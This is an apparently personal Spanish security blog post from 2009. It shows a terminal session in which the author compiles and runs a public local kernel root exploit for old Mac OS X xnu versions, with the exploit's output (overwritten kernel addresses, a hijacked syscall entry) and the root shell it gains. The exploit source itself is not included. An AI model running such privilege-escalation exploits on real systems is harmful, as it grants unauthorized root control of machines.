imac-de-fernando-quintero:~ fernandoquintero$ nano exp.c
imac-de-fernando-quintero:~ fernandoquintero$ gcc -o exp exp.c
imac-de-fernando-quintero:~ fernandoquintero$ mv exp xnu-hfs-fcntl-v2
imac-de-fernando-quintero:~ fernandoquintero$ nano exp.sh
imac-de-fernando-quintero:~ fernandoquintero$ sh exp.sh
-en Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@
-n * creating diskimage...
done
-n * attaching/mounting diskimage...
done
-e * executing exploit...
Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
* getattrlist...done
** attrlist length: 36
** fndrinfo:
* done
* setattrlist...done
* overwriting @0x0050770C
* done
* setattrlist...done
* overwriting @0x00507998
** sysent[21].sy_call: 0x0050770C
* done
* jumping...done
* getuid(): 0
+Wh00t
bash-3.2# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),102(com.apple.sharepoint.group.2),101(com.apple.sharepoint.group.1),4(tty),103(com.apple.sharepoint.group.3),5(operator),80(admin),20(staff)
bash-3.2#
Y para salir?, un exploit decente:
bash-3.2# touch file
bash-3.2# ls -la file
-rw-r--r-- 1 root staff 0 May 17 23:43 file
bash-3.2# exit
exit
-n * detaching/unmounting diskimage...
done
imac-de-fernando-quintero:~ fernandoquintero$LOL
domingo, 17 de mayo de 2009
MacOSX too!
Suscribirse a:
Enviar comentarios (Atom)
Entradas populares
-
Existe una herramienta para MacOSX bastante útil que nos permite eliminar esas molestas aplicaciones que instalan archivos donde menos lo...
-
Esta entrada la hago para recordarle a algunos estudiantes que las vulnerabilidades estan en cualquier parte y eso significa en cualquier di...
-
Esta entrada esta realizada mientras paso por una etapa de Flu , así que no se me ocurrió un mejor titulo. Mientras tiritaba de frío...
-
Hoy en dia un medio de comunicación muy eficiente que se ha popularizado es el uso de los microblogs o sistemas donde se pueden hacer micro...
-
En el reto "Grab Bag" 200 encontramos un servidor corriendo en el puerto 6000 y para el cual nos dan la clave: "Never\$olv3d!...
No hay comentarios:
Publicar un comentario